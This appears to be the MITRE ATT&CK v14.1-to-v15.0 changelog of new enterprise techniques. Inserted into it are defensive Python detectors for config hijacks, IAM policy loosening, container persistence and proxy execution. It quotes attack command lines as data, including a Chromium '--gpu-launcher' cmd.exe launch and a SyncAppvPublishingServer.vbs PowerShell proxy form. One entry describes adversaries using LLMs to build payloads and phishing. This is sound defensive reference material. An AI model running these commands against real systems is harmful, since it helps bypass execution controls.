ATT&CK Changes Between v14.1 and v15.0


Additional formats

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

This JSON file contains the machine readable output used to create this page: changelog.json

Techniques

enterprise-attack

New Techniques

[T1574.014] Hijack Execution Flow: AppDomainManager

Current version: 1.0

Description: Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)
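A defender-side check for the two hijack channels named above, added here as an example and not code from the ATT&CK changelog or from MITRE: it parses .NET `.config` files for AppDomainManager overrides under `<runtime>` and inspects a process environment for the equivalent variables. The element names `appDomainManagerAssembly`/`appDomainManagerType` and the variables `APPDOMAIN_MANAGER_ASM`/`APPDOMAIN_MANAGER_TYPE` are the documented .NET Framework settings; the sample config and assembly name are constructed.

```python
"""Find AppDomainManager overrides in .NET configuration files and in a
process environment, the two hijack channels described for T1574.014.

Added example, not code from the ATT&CK changelog. The <runtime> child
elements appDomainManagerAssembly / appDomainManagerType and the
environment variables APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE are
the documented .NET Framework settings; the sample config below is
constructed for this example.
"""
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

CONFIG_ELEMENTS = ("appDomainManagerAssembly", "appDomainManagerType")
ENV_KEYS = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE")

# Constructed sample: a normal-looking app.config into which an
# AppDomainManager override naming an attacker-chosen assembly was added.
SAMPLE_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8"/>
  </startup>
  <runtime>
    <appDomainManagerAssembly value="NotReallyBenign, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null"/>
    <appDomainManagerType value="NotReallyBenign.Manager"/>
  </runtime>
</configuration>
"""

# Constructed sample with no override.
CLEAN_CONFIG = """<configuration>
  <runtime>
    <gcServer enabled="true"/>
  </runtime>
</configuration>
"""


def config_overrides(xml_text: str) -> Dict[str, str]:
    """Return AppDomainManager settings found under any <runtime> element."""
    root = ET.fromstring(xml_text)
    found: Dict[str, str] = {}
    for runtime in root.iter("runtime"):
        for tag in CONFIG_ELEMENTS:
            elem = runtime.find(tag)
            if elem is not None:
                found[tag] = elem.get("value", "")
    return found


def env_overrides(env: Dict[str, str]) -> Dict[str, str]:
    """Return the AppDomainManager environment variables present in env."""
    return {k: env[k] for k in ENV_KEYS if k in env}


def assess(xml_text: str, env: Dict[str, str]) -> List[str]:
    """List findings for one application. An override through either channel
    deserves review unless the application is known to ship its own
    AppDomainManager."""
    findings = [f"config sets {k}={v!r}" for k, v in config_overrides(xml_text).items()]
    findings += [f"environment sets {k}={v!r}" for k, v in env_overrides(env).items()]
    return findings


def scan_directory(path: str) -> Dict[str, List[str]]:
    """Walk a directory tree and report every *.exe.config that carries an
    AppDomainManager override (unreadable or malformed files are skipped)."""
    results: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(path):
        for name in files:
            if not name.lower().endswith(".exe.config"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8-sig") as fh:
                    hits = config_overrides(fh.read())
            except (OSError, ET.ParseError):
                continue
            if hits:
                results[full] = [f"{k}={v}" for k, v in hits.items()]
    return results


if __name__ == "__main__":
    # Check the constructed config against the current process environment.
    for line in assess(SAMPLE_CONFIG, dict(os.environ)):
        print(line)
```

Run `scan_directory` over application install roots on a host to baseline which executables legitimately configure an AppDomainManager; anything outside that baseline is a candidate for this technique.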


[T1588.007] Obtain Capabilities: Artificial Intelligence

Current version: 1.0

Description: Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)


[T1059.010] Command and Scripting Interpreter: AutoHotKey & AutoIT

Current version: 1.0

Description: Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey) Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate) These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)


[T1556.009] Modify Authentication Process: Conditional Access Policies

Current version: 1.0

Description: Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource. For example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.
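The policy modifications described above (added trusted IP ranges, removed MFA requirements, extra allowed regions) can be caught by diffing policy versions. The following is an added example, not code from the ATT&CK changelog or from AWS: it compares two versions of an AWS IAM policy's `Condition` block. The condition keys `aws:SourceIp`, `aws:MultiFactorAuthPresent` and `aws:RequestedRegion` are real IAM global condition keys; both policy documents are constructed.

```python
"""Report changes between two versions of an AWS IAM policy that loosen its
Condition block: new trusted source IP ranges, a dropped MFA requirement,
or extra allowed regions, the kind of edit T1556.009 describes.

Added example, not code from the ATT&CK changelog. The condition keys
aws:SourceIp, aws:MultiFactorAuthPresent and aws:RequestedRegion are real
IAM global condition keys; both policy documents below are constructed.
"""
import ipaddress
from typing import Any, Dict, List

# Constructed "before" policy: admin actions only from one office range,
# only with MFA, only in eu-west-1.
OLD_POLICY: Dict[str, Any] = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AdminFromOffice",
        "Effect": "Allow",
        "Action": "*",
        "Resource": "*",
        "Condition": {
            "IpAddress": {"aws:SourceIp": ["203.0.113.0/24"]},
            "Bool": {"aws:MultiFactorAuthPresent": "true"},
            "StringEquals": {"aws:RequestedRegion": ["eu-west-1"]},
        },
    }],
}

# Constructed "after" policy: a sub-range of the office (harmless), a new
# unrelated range, the MFA condition gone, and a second region allowed.
NEW_POLICY: Dict[str, Any] = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AdminFromOffice",
        "Effect": "Allow",
        "Action": "*",
        "Resource": "*",
        "Condition": {
            "IpAddress": {"aws:SourceIp": ["203.0.113.0/24", "203.0.113.64/26", "198.51.100.0/24"]},
            "StringEquals": {"aws:RequestedRegion": ["eu-west-1", "ap-southeast-2"]},
        },
    }],
}


def _as_list(value: Any) -> List[Any]:
    """IAM allows a single string or a list in most condition values."""
    return value if isinstance(value, list) else [value]


def _cond(stmt: Dict[str, Any], operator: str, key: str) -> List[Any]:
    return _as_list(stmt.get("Condition", {}).get(operator, {}).get(key, []))


def _covered(cidr: str, ranges: List[str]) -> bool:
    """True if cidr lies inside a previously trusted range, so a narrower
    sub-range does not count as a widening."""
    net = ipaddress.ip_network(cidr, strict=False)
    for r in ranges:
        old = ipaddress.ip_network(r, strict=False)
        if old.version == net.version and net.subnet_of(old):
            return True
    return False


def statement_weakenings(old: Dict[str, Any], new: Dict[str, Any]) -> List[str]:
    """Compare one statement's conditions and describe each loosening."""
    out: List[str] = []
    old_ips = _cond(old, "IpAddress", "aws:SourceIp")
    new_ips = _cond(new, "IpAddress", "aws:SourceIp")
    for cidr in new_ips:
        if not _covered(cidr, old_ips):
            out.append(f"new trusted source IP range {cidr}")
    if old_ips and not new_ips:
        out.append("source IP restriction removed entirely")
    old_mfa = [str(v).lower() for v in _cond(old, "Bool", "aws:MultiFactorAuthPresent")]
    new_mfa = [str(v).lower() for v in _cond(new, "Bool", "aws:MultiFactorAuthPresent")]
    if "true" in old_mfa and "true" not in new_mfa:
        out.append("MFA requirement (aws:MultiFactorAuthPresent) removed")
    old_regions = set(_cond(old, "StringEquals", "aws:RequestedRegion"))
    for region in _cond(new, "StringEquals", "aws:RequestedRegion"):
        if region not in old_regions:
            out.append(f"additional allowed region {region}")
    return out


def policy_weakenings(old_policy: Dict[str, Any], new_policy: Dict[str, Any]) -> Dict[str, List[str]]:
    """Map each Allow statement (matched by Sid) to the loosenings found."""
    old_by_sid = {s.get("Sid"): s for s in old_policy.get("Statement", [])}
    report: Dict[str, List[str]] = {}
    for stmt in new_policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid")
        label = sid or "<no Sid>"
        if sid not in old_by_sid:
            report[label] = ["new Allow statement added"]
            continue
        found = statement_weakenings(old_by_sid[sid], stmt)
        if found:
            report[label] = found
    return report


if __name__ == "__main__":
    for sid, reasons in policy_weakenings(OLD_POLICY, NEW_POLICY).items():
        print(sid, reasons)
```

The same comparison applies to any conditional access product once its policy export is mapped onto the three checks (trusted networks, MFA requirement, allowed locations).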


[T1543.005] Create or Modify System Process: Container Service

Current version: 1.0

Description: Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host. For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker) In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020) Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)
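A review script for the configurations named above (`restart=always` containers, DaemonSets, and pods pinned with `nodeName`/`nodeSelector`), added here as an example and not code from the ATT&CK changelog, Docker or Kubernetes. The Docker records follow the `HostConfig.RestartPolicy` layout that `docker inspect` returns and the Kubernetes objects follow the standard manifest layout; all sample data and the DaemonSet namespace allowlist are constructed.

```python
"""Flag container persistence configurations described in T1543.005:
containers with a persistent restart policy on a host, and Kubernetes
DaemonSets or node-pinned pods outside the namespaces where they are expected.

Added example, not code from the ATT&CK changelog. DOCKER_INSPECT mirrors the
HostConfig.RestartPolicy structure of `docker inspect`; K8S_OBJECTS are
ordinary manifests as parsed objects. All sample data is constructed.
"""
from typing import Any, Dict, List, Set

# Constructed `docker inspect` style records.
DOCKER_INSPECT: List[Dict[str, Any]] = [
    {"Name": "/web-cache", "Config": {"Image": "redis:7"},
     "HostConfig": {"RestartPolicy": {"Name": "no", "MaximumRetryCount": 0},
                    "Privileged": False, "Binds": []}},
    {"Name": "/sysmon-helper", "Config": {"Image": "alpine:3"},
     "HostConfig": {"RestartPolicy": {"Name": "always", "MaximumRetryCount": 0},
                    "Privileged": True, "Binds": ["/:/host"]}},
]

# Constructed Kubernetes objects.
K8S_OBJECTS: List[Dict[str, Any]] = [
    {"kind": "DaemonSet", "metadata": {"name": "node-exporter", "namespace": "kube-system"},
     "spec": {"template": {"spec": {"containers": [{"name": "exporter", "image": "prom/node-exporter"}]}}}},
    {"kind": "DaemonSet", "metadata": {"name": "updater", "namespace": "default"},
     "spec": {"template": {"spec": {"containers": [{"name": "u", "image": "busybox"}]}}}},
    {"kind": "Pod", "metadata": {"name": "debug", "namespace": "dev"},
     "spec": {"nodeName": "control-plane-1", "containers": [{"name": "d", "image": "busybox"}]}},
    {"kind": "Deployment", "metadata": {"name": "api", "namespace": "prod"},
     "spec": {"template": {"spec": {"containers": [{"name": "api", "image": "api:1"}]}}}},
]

PERSISTENT_RESTART = {"always", "unless-stopped"}
DAEMONSET_NAMESPACES: Set[str] = {"kube-system", "monitoring"}  # assumed allowlist


def docker_findings(records: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Containers that survive reboots; note extra host-level capabilities."""
    out = []
    for rec in records:
        hc = rec.get("HostConfig", {})
        policy = hc.get("RestartPolicy", {}).get("Name", "no")
        if policy not in PERSISTENT_RESTART:
            continue
        reasons = [f"restart policy {policy}"]
        if hc.get("Privileged"):
            reasons.append("privileged")
        if any(b.split(":")[0] == "/" for b in hc.get("Binds") or []):
            reasons.append("host root bind-mounted")
        out.append({"source": "docker", "name": rec.get("Name", "?").lstrip("/"), "reasons": reasons})
    return out


def pod_spec(obj: Dict[str, Any]) -> Dict[str, Any]:
    """Pod spec for a Pod, or the template spec of a Deployment/DaemonSet."""
    if obj.get("kind") == "Pod":
        return obj.get("spec", {})
    return obj.get("spec", {}).get("template", {}).get("spec", {})


def k8s_findings(objects: List[Dict[str, Any]],
                 allowed_daemonset_ns: Set[str] = DAEMONSET_NAMESPACES) -> List[Dict[str, Any]]:
    """DaemonSets outside expected namespaces and node-pinned workloads."""
    out = []
    for obj in objects:
        kind, meta, spec = obj.get("kind"), obj.get("metadata", {}), pod_spec(obj)
        ns = meta.get("namespace", "default")
        reasons = []
        if kind == "DaemonSet" and ns not in allowed_daemonset_ns:
            reasons.append(f"DaemonSet in unexpected namespace {ns}")
        if spec.get("nodeName"):
            reasons.append(f"pinned to node {spec['nodeName']}")
        if spec.get("nodeSelector"):
            reasons.append(f"nodeSelector {spec['nodeSelector']}")
        if reasons:
            out.append({"source": "kubernetes", "name": f"{kind}/{ns}/{meta.get('name')}", "reasons": reasons})
    return out


def all_findings(records=DOCKER_INSPECT, objects=K8S_OBJECTS) -> List[Dict[str, Any]]:
    return docker_findings(records) + k8s_findings(objects)


if __name__ == "__main__":
    for f in all_findings():
        print(f["source"], f["name"], "; ".join(f["reasons"]))
```

Feed it `docker inspect $(docker ps -aq)` output and `kubectl get ds,pods,deploy -A -o json` items to run it against a real host or cluster.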


[T1218.015] System Binary Proxy Execution: Electron Applications

Current version: 1.0

Description: Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1) Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe"`).(Citation: Electron 6-8) Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)


[T1027.013] Obfuscated Files or Information: Encrypted/Encoded File

Current version: 1.0

Description: Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use. This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64. The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection. For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.


[T1564.012] Hide Artifacts: File/Path Exclusions

Current version: 1.0

Description: Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions) Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.


[T1665] Hide Infrastructure

Current version: 1.0

Description: Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely. C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies) Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite) Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)


[T1584.008] Compromise Infrastructure: Network Devices

Current version: 1.0

Description: Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting. Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices. Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) Compromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)


[T1216.002] System Script Proxy Execution: SyncAppvPublishingServer

Current version: 1.0

Description: Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv) The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv) Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive countermeasures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv) `SyncAppvPublishingServer.vbs "n; {PowerShell}"`
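Both this entry and the Electron entry (T1218.015) above describe a signed or trusted binary proxying execution, and both leave a distinctive command line. The following detection logic over process-creation events is an added example, not code from the ATT&CK changelog: it flags a `--gpu-launcher` argument on a Chromium/Electron child and a script host running `SyncAppvPublishingServer.vbs` with content after the `n;` prefix. The `parent | image | command line` event format and all sample lines are constructed, not a real Sysmon or EDR schema.

```python
"""Triage process-creation events for two proxy-execution patterns in this
changelog: an Electron/Chromium child launched with --gpu-launcher
(T1218.015) and SyncAppvPublishingServer.vbs carrying a PowerShell payload
after the "n;" prefix (T1216.002).

Added example, not code from the ATT&CK changelog. Events use a constructed
'parent image | image | command line' text format rather than a real Sysmon
or EDR schema; the sample lines are constructed.
"""
import ntpath
import re
from typing import Dict, List, Optional

# Constructed sample events: parent image | image | command line.
EVENTS = [
    r'C:\Users\a\AppData\Local\Microsoft\Teams\current\Teams.exe | C:\Users\a\AppData\Local\Microsoft\Teams\current\Teams.exe | Teams.exe --type=gpu-process --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe"',
    r'C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | "chrome.exe" --type=gpu-process --field-trial-handle=1892',
    r'C:\Windows\explorer.exe | C:\Windows\System32\wscript.exe | wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; Start-Process calc.exe"',
    r'C:\Windows\System32\svchost.exe | C:\Windows\System32\wscript.exe | wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;"',
]

# --gpu-launcher=<quoted or bare value>
GPU_LAUNCHER = re.compile(r'--gpu-launcher=(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# the (optionally quoted) argument that follows the script path
SYNCAPPV_ARG = re.compile(r'SyncAppvPublishingServer\.vbs"?\s+"?([^"]*)"?', re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def parse_event(line: str) -> Dict[str, str]:
    parent, image, cmdline = (part.strip() for part in line.split("|", 2))
    return {"parent": parent, "image": image, "cmdline": cmdline}


def check_gpu_launcher(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """A process told to start a 'GPU launcher' that is itself a program is
    worth an alert; the changelog's example launcher is cmd.exe."""
    m = GPU_LAUNCHER.search(ev["cmdline"])
    if not m:
        return None
    return {
        "rule": "T1218.015 --gpu-launcher abuse",
        "parent": ntpath.basename(ev["parent"]),
        "launcher": m.group(1) or m.group(2),
        "sandbox_disabled": "--disable-gpu-sandbox" in ev["cmdline"].lower(),
    }


def check_syncappv(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag a script host running SyncAppvPublishingServer.vbs whose argument
    carries content after the ';' (the "n; {PowerShell}" form)."""
    if ntpath.basename(ev["image"]).lower() not in SCRIPT_HOSTS:
        return None
    m = SYNCAPPV_ARG.search(ev["cmdline"])
    if not m or ";" not in m.group(1):
        return None
    payload = m.group(1).split(";", 1)[1].strip()
    if not payload:
        return None
    return {
        "rule": "T1216.002 SyncAppvPublishingServer.vbs proxy",
        "parent": ntpath.basename(ev["parent"]),
        "payload": payload,
    }


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Run every check over every event and collect the hits in order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        for check in (check_gpu_launcher, check_syncappv):
            hit = check(ev)
            if hit:
                hit["cmdline"] = ev["cmdline"]
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["rule"], "<-", hit["cmdline"])
```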


[T1548.006] Abuse Elevation Control Mechanism: TCC Manipulation

Current version: 1.0

Description: Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to execute malicious applications with elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA). When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC) Adversaries may manipulate the TCC database or otherwise abuse the TCC service to execute malicious content. This can be done in various ways, including using privileged system applications to execute malicious payloads or manipulating the database to grant their application TCC permissions. For example, adversaries can use Finder, which has FDA permissions by default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) while preventing a user prompt. For a system without System Integrity Protection (SIP) enabled, adversaries have also manipulated the operating system to load an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database) Adversaries may also opt to instead inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055)) into targeted applications with the desired TCC permissions.

Major Version Changes

[T1651] Cloud Administration Command

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)

New Description

Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command) If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)
Details

values_changed
  STIX Field                  | Old value                                | New value
  modified                    | 2023-04-14 19:01:12.963000+00:00         | 2024-04-12 03:27:48.171000+00:00
  description                 | (old text, see Old Description above)    | (new text, see New Description above)
